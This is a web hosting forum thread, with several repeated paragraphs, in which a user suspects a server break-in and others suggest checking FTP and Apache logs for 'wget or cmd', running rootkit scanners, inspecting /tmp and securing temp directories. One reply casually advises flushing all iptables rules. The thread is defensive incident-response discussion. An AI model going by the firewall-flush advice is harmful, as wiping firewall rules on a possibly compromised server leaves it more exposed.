I am fairly sure that someone has hacked into our server either by exploit or by guessing our password. I want to find the logs of the FTP access, but I can't get them thru cPanel. I downloaded the main file and it brings up a command prompt and then in the FTP Manager section I can't access the links at the bottom because they don't exist. Any suggestions?!
Hint!
Try logging in to your console (ssh), go to /var/logs and search there:
- xferlog - ftp log
- /usr/local/apache/domlogs/ - search for wget or cmd
- last - the last logins to your server
Don't forget to run rkhunter and chkrootkit.
Also, do a:
# ps -auxf | grep nobody
... to see if there are any started processes.
Go to /tmp and search for any suspicious files.
If "the one" who broke your server and wasn't stupind enough you won't find a thing.
Try logging in to your console (ssh), go to /var/logs and search there:
- xferlog - ftp log
- /usr/local/apache/domlogs/ - search for wget or cmd
- last - the last logins to your server
Don't forget to run rkhunter and chkrootkit.
Also, do a:
# ps -auxf | grep nobody
... to see if there are any started processes.
Go to /tmp and search for any suspicious files.
If "the one" who broke your server and wasn't stupind enough you won't find a thing.
Advice...
> How do you login using SSH?
google.com -> putty ssh
This is a small tool that will let you connect to your unix based server from any windows computer.
> I can still access the console, but I know someone banned IPs and screwed something up because now nothing works.
You mean you have direct access to that server? Do
# iptables -F && iptables -F -t nat && iptables -F -t mangle
... if you don't have direct access to the server, ask your seller to do that. You will need ROOT ACCESS to do that, then login from windows pc via ssh.
> How do you login using SSH?
google.com -> putty ssh
This is a small tool that will let you connect to your unix based server from any windows computer.
> I can still access the console, but I know someone banned IPs and screwed something up because now nothing works.
You mean you have direct access to that server? Do
# iptables -F && iptables -F -t nat && iptables -F -t mangle
... if you don't have direct access to the server, ask your seller to do that. You will need ROOT ACCESS to do that, then login from windows pc via ssh.
If you are hosting your web site, you'll have to contact your host for help. If you have a dedicated server and need help, contact your Data Center, or seek professional help.KillaH425 said:
the /scripts/securetmp script will fix a lot hack attempts, at least the cant run executables'ou t the tmp dirs. There are always on a webhosting system a lot php applications that are leak. Much webmasters don't update their PHP application in time or not at all.
Now i see a lot weird executeables in my tmp dirs but they are not started anymore
that saved a lot trouble hehe
I only miss the secure of the shm device in that script (box is FC).
Danny.
Now i see a lot weird executeables in my tmp dirs but they are not started anymore
that saved a lot trouble hehe I only miss the secure of the shm device in that script (box is FC).
Danny.
| Thread starter | Similar threads | Forum | Replies | Date |
|---|---|---|---|---|
| A | Account contact info change to hackerish address | Security | 5 | |
| P | How to find hackers access point | Security | 8 | |
|
How To Protect Server Files From Hackers | Security | 3 | |
| D | Attempted hacker | Security | 2 | |
|
Is there anything which would block potential web hacker | Security | 11 |